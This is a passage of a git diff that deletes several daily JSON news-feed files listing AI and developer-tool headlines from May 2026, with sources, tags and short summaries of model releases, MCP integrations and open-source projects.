correct * Hindsight: 0.733658 AMB score, 326 / 400 correct * CSM uses 38.2% fewer answer-visible context tokens * CSM is slower: 29.23s average retrieval vs 6.38s I want to be precise about the claim: This is not an official leaderboard claim. It is not a BEAM 10M claim. It is a committed local accepted-artifact comparison at 100K, and the next step should be independent replication or official chart acceptance. Repo: [https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory](https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory) Evidence and reproducibility notes: [https://muhamadjawdatsalemalakoum.github.io/context-swarm-me…", - "category": "ai_research" - }, - { - "title": "Running real-time 1080p video generation and editing on your own (Dreamverse OSS release)", - "url": "https://reddit.com/r/StableDiffusion/comments/1tpfbrl/running_realtime_1080p_video_generation_and/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-27T19:07:02.000Z", - "summary": "Hi guys, FastVideo team here again. Following up on our[ Dreamverse post](https://haoailab.com/blogs/dreamverse/), today we finally cleaned our code up and are excited to say that it's open source! Both the backend and frontend are out, so you can self-host the whole thing. B200s aren't exactly consumer hardware (we know), so the easiest path is to rent one from a cloud GPU provider. Once you've got access, spin up the server and start editing videos in your browser. There's also a mock backend in the repo if you want to hack on the UI without touching a GPU. The release covers the browser workspace, Python runtime for sessions and worker management, fMP4 streaming over websocket, prompt rewriting with safety filters, plus Docker images. The idea is that it can also serve as a sample architecture for anyone building their own real-time video gen apps. One more thing before you go. On the RTX 5090 side, we've gotten Wan2.1 1.3B running in under 2s on a single 5090, and we're working on integrating it into Dreamverse so y'all don't need a B200 to play with this. More on that soon :) Repo: [https://github.com/hao-ai-lab/FastVideo/tree/main/apps/dreamverse](https://github.com/hao-ai-l…", - "category": "creative_tools" - }, - { - "title": "Qwen3.6 huge quality gain from Q4 to Q6 for coding agent", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tpebhw/qwen36_huge_quality_gain_from_q4_to_q6_for_coding/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-27T18:32:18.000Z", - "summary": "So, last week I tried to update my unused local LLM setup. I had to stop using it because quality was too low and deepseek was too cheap. First thing I stopped using Ollama and now I only use llama.cpp built in server that works really great. The quality improvement from Q4 to Q6 is outstanding and finally a local LLM server can work very similarly to paid APIs. That's great! And MTP makes a big performance gain, on a dual 3090 (downvolted and limited to 65°C) it generates from 20 to 50 tokens per second with minimal heat generation. So yes, that time has finally arrived! Local coding agents are a thing and they work 😎", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-28.json b/data/news-feed-2026-05-28.json deleted file mode 100644 index e434f79..0000000 --- a/data/news-feed-2026-05-28.json +++ /dev/null @@ -1,271 +0,0 @@ -{ - "generated": "2026-06-05T00:44:44.425Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-28", - "article_count": 15, - "archived_story_count": 714, - "articles": [ - { - "title": "Claude Code 2.1.153 Open Changelog Reflects Anthropic's Transparent Developer Tooling Strategy", - "url": "https://x.com/ClaudeCodeLog/status/2059802880811434228", - "source": "Aligned News (Scoble)", - "tags": [ - "cli_tool", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-28T12:12:48.493Z", - "summary": "Anthropic's commitment to publishing detailed Claude Code changelogs with every release enables developers to track improvements and plan migrations. Version 2.1.153 with 36 CLI changes reflects rapid iteration in the agentic coding space.", - "category": "ai_tools" - }, - { - "title": "I built and open-sourced Skill Index to organize & standardize your AI agent knowledge across Claude, Codex, Cursor, and more. 100% local and free on macOS.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tprx27/i_built_and_opensourced_skill_index_to_organize/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-28T03:36:12.000Z", - "summary": "I’ve been using Claude alongside other coding agents, and I kept running into the same problem: useful skills, MCPs, commands, hooks, and workflows start getting scattered across different tools. Sometimes Claude has the best version of something. Sometimes Codex or Cursor does. Sometimes an MCP is configured in one agent but missing or slightly different in another. Over time, it gets harder to treat your agent knowledge as one reusable system. So I built Skill Index: a free, open-source, 100% local macOS app for organizing and standardizing AI agent knowledge. The goal is to make it easier to bring reusable skills/MCPs/agent knowledge into Claude, while also keeping Claude’s own knowledge portable across the rest of your setup. It can help you: \\- see where your skills and MCPs live \\- compare what Claude, Codex, Cursor, Windsurf, and other agents can access \\- standardize around a canonical definition of each skill/MCP \\- keep your skills and MCPs in sync across every agent It’s local-first: no accounts, no cloud sync, no telemetry. Website: [https://skillindex.app](https://skillindex.app) GitHub: [https://github.com/arjitj2/skillindex](https://github.com/arjitj2/skillindex)", - "category": "ai_tools" - }, - { - "title": "MCP Servers / Connectors in Claude Desktop / Cowork via AWS Bedrock", - "url": "https://reddit.com/r/ClaudeAI/comments/1tpxskx/mcp_servers_connectors_in_claude_desktop_cowork/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool", - "cli_tool" - ], - "importance": 0.78, - "date": "2026-05-28T08:48:48.000Z", - "summary": "While using MCP servers in the code CLI works with MCP servers, I'm having trouble using connectors or MCP servers in Cowork. Connecting to Jira or O365 seems not possible. With Bedrock, we don't have the Chat, but only the Cowork tab and also some additional settings are missing. I tried configuring the claude\\_desktop\\_config.json with MCP servers, but cowork doesn't seem to be able to use it. I can Import a manual plugin, but after a restart it seems gone and configuring it in cowork is not possible, the authentication doesn't work. Did anyone manage to get Connectors / MCP Servers / Plugins in Claude Desktop with Bedrock to work, and if so, how?", - "category": "ai_tools" - }, - { - "title": "Introducing Claude Opus 4.8", - "url": "https://reddit.com/r/ClaudeAI/comments/1tq99mu/introducing_claude_opus_48/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 1, - "date": "2026-05-28T16:52:23.000Z", - "summary": "We’re upgrading Claude Opus to a new version: Claude Opus 4.8. It builds on Opus 4.7 with sharper judgment, more honesty about its own progress, and the ability to work independently for longer than its predecessors. Available today for the same price. In Claude Code, you can hand off a feature, a migration, or a bug sweep and let it follow the work through while you focus on what’s next. Also launching today: * Fast mode for Opus 4.8 (research preview). Same model at roughly 2.5x the speed, now three times cheaper than before. * Dynamic workflows in Claude Code (research preview). Claude runs hundreds of parallel subagents in a single session and verifies its work before reporting back. * A new effort control on [claude.ai](http://claude.ai), so you can choose how much thinking Claude puts into a response. Claude Opus 4.8 is live today on [claude.ai](http://claude.ai), the Claude Platform, and all major cloud platforms. Read more: [anthropic.com/news/claude-opus-4-8](http://anthropic.com/news/claude-opus-4-8)", - "category": "ai_tools" - }, - { - "title": "I built an enforcement layer for AI coding agents using a local knowledge graph and hybrid RAG", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tq6sd0/i_built_an_enforcement_layer_for_ai_coding_agents/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-28T15:23:21.000Z", - "summary": "I know this sub is focused on local models but the architecture behind this applies to any LLM-powered coding agent, not just Claude Code. The problem: when you give a coding agent a large set of rules and standards, two things break. The context fills up with rules that aren't relevant to the current task, and nothing enforces compliance. The agent reads your instructions and decides what to follow. I built Writ to solve both. The knowledge layer: rules, skills, techniques, antipatterns, and playbooks live as nodes in a Neo4j knowledge graph with typed relationships between them. A five stage retrieval pipeline (BM25 over Tantivy, vector similarity over HNSW with a local ONNX embedding model, graph traversal, reciprocal rank fusion, context budget management) retrieves only what's relevant per task. Everything runs locally. No API calls for retrieval. The embedding model (all-MiniLM-L6-v2) runs through ONNX runtime, not PyTorch, so inference is fast without a GPU. The enforcement layer: 30 bash hook scripts intercept tool calls before execution. The agent can't write code without an approved plan, can't skip tests, can't say \"tests pass\" without running static analysis. These are…", - "category": "ai_models" - }, - { - "title": "Kept context-switching between arxiv, OpenReview, GitHub, and HuggingFace for every paper, so I built this. Chrome extension + website with everything inline, plus citation graph + SPECTER2 neighbors. 3M papers, free, feedback welcome [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tq53il/kept_contextswitching_between_arxiv_openreview/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-28T14:21:49.000Z", - "summary": "Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com/) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use?", - "category": "ai_research" - }, - { - "title": "Built a richer reading layer for arxiv (Chrome extension + web): OpenReview reviews, GitHub/HuggingFace links, citation graph, SPECTER2 neighbors, TLDRs. 3M papers, free, looking for feedback [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tq31yu/built_a_richer_reading_layer_for_arxiv_chrome/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-28T13:05:39.000Z", - "summary": "Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use?", - "category": "ai_research" - }, - { - "title": "SDXL image generation now works on iPhone. The bug that blocked it for months was a missing file check", - "url": "https://reddit.com/r/StableDiffusion/comments/1tq302b/sdxl_image_generation_now_works_on_iphone_the_bug/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-28T13:03:34.000Z", - "summary": "We've been building \\[Off Grid\\](https://github.com/alichherawalla/off-grid-mobile-ai) - open-source app for on-device AI (text + image gen, no cloud). SDXL on iPhone was broken for months. Users kept reporting it, we couldn't reproduce it consistently. Turns out: SDXL models ship in two UNet layouts: \\- Monolithic: one big \\`Unet.mlmodelc\\` file \\- Chunked: \\`UnetChunk1.mlmodelc\\` + \\`UnetChunk2.mlmodelc\\` Our validation code only checked for the monolithic layout. If you downloaded a chunked SDXL model (which most are), the app said \"model invalid\" and refused to load it. Months of reports. The fix was adding the chunked layout check — straightforward once we understood the problem. The app uses Apple's ml-stable-diffusion framework with CoreML. On an iPhone 15 Pro, you get SDXL images in about 30-45 seconds fully on-device. No internet needed at any point - the model lives on your phone. It's free and open source: \\- GitHub: [https://github.com/alichherawalla/off-grid-mobile-ai](https://github.com/alichherawalla/off-grid-mobile-ai) \\- iOS: [https://apps.apple.com/us/app/off-grid-local-ai/id6759299882](https://apps.apple.com/us/app/off-grid-local-ai/id6759299882) \\- Android (SD…", - "category": "creative_tools" - }, - { - "title": "DSPy v3.3.0 Beta Brings ReActV2 to Open-Source AI Programming Framework", - "url": "https://x.com/isaacbmiller1/status/2059828079371894786", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-28T12:12:48.493Z", - "summary": "Stanford's DSPy framework released v3.3.0 beta on PyPI with ReActV2, improved LM/BaseLM architecture, and RLM data-passing support. DSPy is widely used for structured programming with language models in both research and production.", - "category": "ai_tools" - }, - { - "title": "Tencent WorkBuddy Global Launch Brings China's Top Desktop AI Agent to International Markets", - "url": "https://x.com/TencentAI_News/status/2059827192964808922", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-28T12:12:47.642Z", - "summary": "Tencent's WorkBuddy desktop AI agent — already China's market leader — launches worldwide with autonomous handling of coding, analysis, and productivity tasks. The global launch challenges Microsoft Copilot, Cursor, and other Western enterprise AI assistants on their home turf.", - "category": "ai_tools" - }, - { - "title": "Local run for multi users: which software set?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tq0cj7/local_run_for_multi_users_which_software_set/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-28T11:06:34.000Z", - "summary": "Context: I am testing and running local LLM on Linux for some months, first with llama.cpp and now with vLLM for better concurrent capabilities. I use llama-swap in front of either vLLM or llama.cpp in order to have thinking and non-thinking variants exposed with all inference parameters adjusted according to the model requirements. My needs: now, I would like to make the LLM available to multiple (less than 10) users, outside from the local network: https access, web chat interface with either connection or api-key, API access with api-key. What I tried: * apache as frontend proxy: handle SSL part and redirect to internal applications as unsecured connections. * LibreChat as web user interface * llama-swap * vLLM Observed problems: * concurrency is limited to 10 requests (llama-swap limitation, either find how to raise this value or good alternative) * LibreChat only gives web interface, still need API access with keys management. Which open source software set do you use to serve multiple users? Do you know simple keys management tools? Did I miss something? Thank for any help!", - "category": "ai_models" - }, - { - "title": "OpenAI releases secure tunnels to connect private Model Context Protocol servers without modifying inbound firewallsOutbound-only HTTPS tunnels secure the connection to OpenAI.", - "url": "https://www.digg.com/ai/28n5w7d2", - "source": "Digg AI", - "tags": [ - "mcp", - "product_launch" - ], - "matching_tags": [ - "mcp", - "product_launch" - ], - "importance": 1, - "date": "2026-05-28T05:18:10.307Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Genesis AI launches Genesis World 1.0, an open-source robotics simulator that turns one hour of real-world testing into 100 simulation daysIt features GPU-accelerated physics solvers and path-traced rendering", - "url": "https://www.digg.com/ai/tuo1sird", - "source": "Digg AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-28T05:18:10.290Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Vulnerability found in framework used by VLLM, many MCP servers, and other LLM tools", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tpp2th/vulnerability_found_in_framework_used_by_vllm/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-28T01:27:29.000Z", - "summary": "Worth taking a look to see if this affects any of you. Surprised nobody has posted it yet.", - "category": "ai_models" - }, - { - "title": "GH200 NVL2 or 8x RTX 6000 Blackwell for running Kimi K2.6 / DeepSeek V4 locally? (5 devs, agentic coding)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tpp0a7/gh200_nvl2_or_8x_rtx_6000_blackwell_for_running/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-28T01:24:20.000Z", - "summary": "Trying to figure out the right box for my team and wanted to see if anyone had any clue which would be a better fit or if it is not worth our time in our budget. Situation: 5 of us doing agentic coding (lots of long context getting re-sent every turn, parallel tool calls, etc.) and we want to self-host the latest open MoE models — Kimi K2.6 and DeepSeek V4 class. My boss likes the idea of having it in house so no point in just saying pay the API (I did pitch that) Budget is around $100k - $150k. I'm stuck between a dual GH200 NVL2 (cheaper, \\~1.2TB unified memory) (about 95k) and an 8x RTX 6000 Pro Blackwell build (768GB of actual fast VRAM, more expensive) (about 140k). To get real numbers I rented a single GH200 and tested Kimi K2.6 at a 2-bit quant. After some playing around I got it up to \\~23 tok/s decode, which is not bad considering it is one GH200 with only 96gb of HBM, but I am not sure how it will scale to the dual GH200. The prefill was pretty slow yet again not sure how it will scale. The thing I keep coming back to: these models are too big to fit in HBM no matter what. Even the NVL2's 288GB HBM3e can't hold them, so the model partially lives in the slower unified mem…", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-29.json b/data/news-feed-2026-05-29.json deleted file mode 100644 index f69c931..0000000 --- a/data/news-feed-2026-05-29.json +++ /dev/null @@ -1,259 +0,0 @@ -{ - "generated": "2026-06-05T00:44:44.652Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-29", - "article_count": 15, - "archived_story_count": 468, - "articles": [ - { - "title": "Runway Exposes Gen-4.5, Kling, and GPT Image 2 via MCP — Creative Models Now Callable Inside Claude, Cursor, and Replit Agents", - "url": "https://x.com/runtimewire/status/2059782827927810437", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-29T12:05:45.033Z", - "summary": "Runway plugged its creative model suite into Claude, ChatGPT, Cursor, and Replit via MCP, making image and video generation callable directly inside AI agent workflows. Runway Gen-4.5, Kling, and GPT Image 2 are all exposed through the integration.", - "category": "ai_tools" - }, - { - "title": "Kling AI Skill Launches for Agent Workflows — Text-to-Video, 4K Images, and Cross-Scene Consistency in Claude and Cursor", - "url": "https://x.com/MayorKingAI/status/2044455291664695688", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-29T12:05:45.033Z", - "summary": "Kling AI launched a dedicated Skill for AI agent workflows, enabling text/image to video generation, 4K image generation, style transfer, and cross-scene consistency with custom elements. Works natively with Claude, Cursor, Copilot, Codex, and OpenClaw.", - "category": "ai_tools" - }, - { - "title": "Motion Launches Motion API — Connect the AI Motion Design Tool Directly Into Claude, Codex, OpenClaw, and Hermes", - "url": "https://x.com/_adishj/status/2060028771399500237", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "matching_tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-28T17:59:08.283Z", - "summary": "Motion released the Motion API, enabling one-click integration of the AI motion design tool directly into Claude, Codex, OpenClaw, Hermes, and other AI frameworks. Agents can now generate motion design content as part of automated creative workflows.", - "category": "ai_tools" - }, - { - "title": "X Square Robot Releases Open-Source WALL-WM World Model For Embodied AI", - "url": "https://www.digg.com/ai/v4d0ka2f", - "source": "Digg AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-29T15:24:17.045Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Anthropic Releases Opus 4.8 With Strong Agentic Coding Benchmarks", - "url": "https://www.digg.com/ai/6gzrebez", - "source": "Digg AI", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-29T15:24:17.038Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "ElevenLabs Launches Dubbing V2 — SOTA Audio-to-Audio Dubbing That Preserves Emotion in 90+ Languages", - "url": "https://x.com/Carles_Reina/status/2060035887946248616", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-28T17:59:08.282Z", - "summary": "ElevenLabs introduced Dubbing V2, described as the world's state-of-the-art model for high-quality dubbing. The Audio-to-Audio model preserves the original speaker's emotion and intent across 90+ languages. Available now through ElevenCreative, with API access coming soon.", - "category": "ai_tools" - }, - { - "title": "Hexo Releases SIA — Open-Source Self-Improving AI That Updates Its Own Weights During Goal Pursuit", - "url": "https://x.com/kunalbhatia91/status/2060013228231725092", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-28T17:54:34.974Z", - "summary": "Hexo released SIA, an open-source Self-Improving AI that achieves goals through recursive self-improvement — updating its own capabilities as it works toward a goal, not just calling tools with fixed capabilities. The announcement earned 221 likes and 80,000 views.", - "category": "ai_tools" - }, - { - "title": "Shift Launches in NYC — AI Economy Startup Offers Free Home Cleaning to Bridge Today's Economy to the AI Abundance Era", - "url": "https://x.com/bercankilic/status/2060043312606638245", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-28T17:49:05.507Z", - "summary": "Shift launched in New York City with a mission to bridge the current economy into the AI economy where goods, services, and leisure become affordable through AI. The launch includes free home cleaning as the entry product.", - "category": "ai_tools" - }, - { - "title": "minWM: A Full-Stack Open-Source Framework for Real-Time Interactive Video World Models", - "url": "https://paperswithcode.com/papers/2605.30263", - "source": "Papers With Code", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.9, - "date": "2026-05-29T15:24:25.298Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "DeepSeek's Deli Chen releases an LLM continual learning survey paper generated autonomously by the DeliAutoResearch systemIt maps out self-improvement methods like STaR and o1.", - "url": "https://www.digg.com/ai/xay55qwq", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-29T15:24:17.054Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "ElevenLabs Releases Dubbing V2 With Emotion-Preserving Multilingual Audio", - "url": "https://www.digg.com/ai/hsa7ykbd", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-29T15:24:17.027Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "OpenAI launches Rosalind Biodefense, giving U.S. government agencies access to its specialized GPT-Rosalind modelThe initiative focuses on defending against engineered pathogens.", - "url": "https://www.digg.com/ai/dl0e6ofa", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-29T15:24:17.024Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Anthropic releases Claude Opus 4.8 with improved coding and agentic performance at the same price as Opus 4.7", - "url": "https://www.digg.com/ai/a6c6c36e-38c7-4420-9908-d435740c4ac8", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-29T15:24:17.014Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "100% AI Product Videos Made in Under 5 Minutes Achieve Commercial Quality — Realism Framework Hits New Threshold", - "url": "https://x.com/Mho_23/status/2048507307466658062", - "source": "Aligned News (Scoble)", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-29T12:05:45.033Z", - "summary": "AI-generated product videos made in under 5 minutes are reaching commercial marketing quality, with a realism framework demonstrating results compelling enough for real product ads. The UGC video format has become the clearest commercial use case for AI video generation.", - "category": "ai_tools" - }, - { - "title": "Garry Tan Endorses Hermes Agent Stack — YC President's 600-Like Post Signals Mainstream Adoption", - "url": "https://x.com/garrytan/status/2052434681363321056", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-29T12:02:13.220Z", - "summary": "Y Combinator President Garry Tan publicly endorsed his OpenClaw/Hermes Agent setup as significantly improved, with the post generating 600+ likes. The endorsement signals that open-source agent coordination has crossed from early adopter into mainstream developer infrastructure.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-30.json b/data/news-feed-2026-05-30.json deleted file mode 100644 index 3ec9f9e..0000000 --- a/data/news-feed-2026-05-30.json +++ /dev/null @@ -1,243 +0,0 @@ -{ - "generated": "2026-06-05T00:44:44.837Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-30", - "article_count": 15, - "archived_story_count": 214, - "articles": [ - { - "title": "Show HN: VT Code – open-source terminal coding agent in Rust", - "url": "https://github.com/vinhnx/VTCode", - "source": "Hacker News", - "tags": [ - "open_source", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool", - "agent_tool" - ], - "importance": 0.82, - "date": "2026-05-30T03:07:25.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "OpenAI releases Codex v26.527, enabling Windows computer use and remote desktop control from mobile devicesA new profile interface tracks token activity and usage statistics.", - "url": "https://www.digg.com/ai/2cvxmdwh", - "source": "Digg AI", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-30T05:18:16.453Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Oura Ring 5 Launches — 40% Smaller Than Ring 4, Blood Pressure Monitoring, Ships June 4 at $399", - "url": "https://ouraring.com/blog/oura-ring-5", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-29T23:40:17.517Z", - "summary": "Oura launched Ring 5, the world's smallest smart ring at 40% smaller than Ring 4, starting at 2 grams. New features include blood pressure change monitoring, sleep apnea detection, and an AI health coach. Ships June 4, $399.", - "category": "ai_tools" - }, - { - "title": "Cursor Releases Developer Habits Report on AI Coding Trends", - "url": "https://www.digg.com/ai/6jh7d90b", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-30T05:18:16.474Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Brilliant Launches Koji AI Tutor to Build Kids' Critical Thinking", - "url": "https://www.digg.com/ai/9jzt6gwc", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-30T05:18:16.461Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Shift Launches Free NYC Cleaning to Gather Robotics Training Data", - "url": "https://www.digg.com/ai/5ol0wuf6", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-30T05:18:16.459Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Mythos-Class AI Models Coming to All Customers in Weeks — Anthropic Confirms Safeguards Ready After Restricted Testing", - "url": "https://www.bloomberg.com/news/articles/2026-05-28/anthropic-plans-wide-release-of-mythos-level-ai-models-in-weeks", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-29T23:40:17.517Z", - "summary": "Anthropic confirmed through Bloomberg and Axios that Mythos-class models — previously limited to select testers under Project Glasswing due to cyber capabilities — will reach general availability in coming weeks after completing safety validation.", - "category": "ai_tools" - }, - { - "title": "Mystery Company Burns $500M on Claude in One Month — Token Budget Collapse Exposes Enterprise AI Cost Controls Gap", - "url": "https://www.tomshardware.com/tech-industry/ai/mystery-company-accidentally-blew-500-million-on-claude-ai-in-a-single-month", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-29T23:37:37.979Z", - "summary": "An unidentified company accidentally spent $500 million on Claude API in a single month after failing to set usage limits on employee licenses, per Tom's Hardware and WSJ. Amazon's concurrent token leaderboard shutdown after employees gamed it reveals tokenmaxxing as a systemic enterprise risk.", - "category": "ai_tools" - }, - { - "title": "Bun Rewrote Itself in Rust in 6 Days Using Claude Dynamic Workflows — Jarred Sumner Confirms 'Anthropic Launch Stunt'", - "url": "https://x.com/jarredsumner/status/2060XXX", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-29T23:37:37.979Z", - "summary": "Jarred Sumner confirmed that Bun's headline-grabbing Rust rewrite in 6 days was made possible by Claude Code's Dynamic Workflows — and a Bluesky user noted it was 'an Anthropic launch stunt.' The incident illustrates both the genuine capability of agentic coding and the coordinated nature of AI marketing.", - "category": "ai_tools" - }, - { - "title": "wolfSSL releases a new product; wolfCOSE a zero alloc C embbedded COSE stack", - "url": 